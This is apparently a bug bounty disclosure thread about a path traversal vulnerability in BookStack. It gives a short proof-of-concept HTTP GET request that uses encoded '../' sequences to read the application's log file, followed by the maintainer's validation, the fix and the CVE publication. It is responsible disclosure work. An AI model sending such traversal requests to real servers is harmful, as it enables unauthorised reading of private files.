Path Traversal in bookstackapp/bookstack


Reported on

Oct 30th 2021


During reading recent BookStack source code (85dc8d) I discovered path traversal vulnerability. Authenticated user can have access to all files stored in storage directory.

Proof of Concept

GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


Read log files which paths are predictable.

We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back 2 years ago
Dan Brown
2 years ago


Thanks you so much again @theworstcomrade. Have verified on my own instance. Looks like there are some level of webserver protections that prevent this going too far up which is something but still far from ideal.

I'm especially annoyed at myself for having this vulnerability. Think I need to do a review through all image and attachment systems as many of these were written before I've been exposed to, and learnt from, a wide range of attack vectors.

Will mark this as valid and work into a patch to be deployed with the other fix.

Since you won't be paid due to the depleted bucket, is there a way I can send you £40 myself? I really appreciate your efforts of discovering and reporting this.

Dan Brown validated this vulnerability 2 years ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
Dan Brown marked this as fixed with commit 43830a 2 years ago
Dan Brown has been awarded the fix bounty
ImageController.php#L38 has been validated
2 years ago


@ssdmanbrown This patch looks good, I am no longer able to repeat the vulnerability. Thank You also for the bounty.

Jamie Slome
2 years ago

CVE published! 🎊

to join this conversation